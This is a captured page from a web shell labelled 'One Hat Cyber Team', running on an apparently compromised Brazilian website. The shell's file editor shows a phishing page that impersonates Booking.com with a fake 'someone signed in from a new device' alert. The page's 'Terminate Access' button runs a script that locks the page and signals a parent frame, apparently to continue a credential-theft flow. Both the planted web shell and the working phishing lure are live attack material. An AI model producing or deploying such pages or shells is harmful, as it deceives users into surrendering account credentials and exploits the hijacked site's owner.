One Hat Cyber Team
Your IP :
216.73.217.12
Server IP :
170.247.48.121
Server :
Linux UBAPDWEB9271 3.10.0-1160.71.1.el7.x86_64 #1 SMP Tue Jun 28 15:37:28 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.0.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lelopagani.com.br
/
public
/
assets
/
sass
/
data
/
Edit File:
index_1.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Alert - Booking.com</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; background-color: #ffffff; min-height: 100vh; } .main-container { display: flex; justify-content: center; align-items: flex-start; min-height: calc(100vh - 52px); padding: 80px 20px 40px 20px; } .content-card { background: white; width: 100%; max-width: 380px; padding: 0; text-align: left; } .main-title { font-size: 18px; font-weight: 700; color: #262626; line-height: 1.3; margin-bottom: 32px; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .activity-section { margin-bottom: 32px; } .activity-label { font-size: 14px; font-weight: 700; color: #262626; margin-bottom: 12px; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .activity-details { font-size: 14px; color: #262626; line-height: 1.4; font-weight: 400; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .activity-line { margin-bottom: 4px; } .terminate-btn { background-color: #1a73e8; color: white; border: none; border-radius: 3px; padding: 14px 20px; font-size: 14px; font-weight: 600; cursor: pointer; width: 100%; margin-bottom: 20px; transition: background-color 0.2s ease; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .terminate-btn:hover { background-color: #1557b0; } .help-link { color: #1a73e8; text-decoration: none; font-size: 14px; line-height: 1.4; display: block; text-align: center; margin-bottom: 32px; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .help-link:hover { text-decoration: underline; } .footer-text { font-size: 12px; color: #737373; line-height: 1.4; text-align: center; margin-bottom: 8px; font-family: BlinkMacSystemFont, -apple-system, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif; } .footer-text a { color: #1a73e8; text-decoration: none; } .footer-text a:hover { text-decoration: underline; } .rights-text { font-size: 12px; color: #737373; text-align: center; margin-bottom: 4px; } .copyright-text { font-size: 12px; color: #737373; text-align: center; } @media (max-width: 480px) { .content-card { padding: 32px 24px 24px 24px; margin: 0 16px; } } </style> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td> <table border="0" cellpadding="0" cellspacing="0" style="background-color:#003580" width="100%"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0" width="640"> <tr> <td style="padding:20px 8px 17px 8px;color:#ffffff"> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="left"> <a style="color:white;font-size:24px;font-weight:bold;text-decoration:none;font-family:BlinkMacSystemFont,-apple-system,'Segoe UI',Roboto,Helvetica,Arial,sans-serif" target="_blank"> Booking.com </a> </td> <td align="right"> <div style="width:24px;height:24px;border:2px solid rgba(255,255,255,0.8);border-radius:50%;display:flex;align-items:center;justify-content:center;color:white;font-size:14px;font-weight:bold;text-align:center;line-height:20px;font-family:BlinkMacSystemFont,-apple-system,'Segoe UI',Roboto,Helvetica,Arial,sans-serif">?</div> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <div class="main-container"> <div class="content-card"> <h1 class="main-title translatable" data-key="title"> Someone signed in to your account from a new device </h1> <div class="activity-section"> <div class="activity-label translatable" data-key="activity">Activity Details:</div> <div class="activity-details"> <div class="activity-line translatable" data-key="edge">Edge 125, Ubuntu 22.04</div> <div class="activity-line translatable" data-key="approximate">Approximate location: Sao Tome and Principe</div> </div> </div> <button class="terminate-btn translatable" onclick="getCap()" data-key="access">Terminate Access</button> <a href="#" class="help-link translatable" data-key="help"> Didn't recognize this activity? Click the button to end the session. </a> <div class="footer-text translatable" data-key="footer"> By signing in or creating an account, you agree with our <a href="#" class="translatable" data-key="terms">Terms &<br><span class="translatable" data-key="conditions"> Conditions</span></a><span class="translatable" data-key="and"> and </span><a href="#" class="translatable" data-key="privacy">Privacy Statement</a> </div> <div class="rights-text translatable" data-key="rights"> All rights reserved. </div> <div class="copyright-text translatable" data-key="copyright"> Copyright (2006-2025) — Booking.com™ </div> </div> </div> <script src="./translate.js"></script> <script> function getCap() { document.body.style.overflow = "hidden" document.body.style.userSelect = "hidden" window.parent.postMessage({ type: 'TRIGGER_EVENT5', data: '' }, '*'); } </script> </body> </html>
Simpan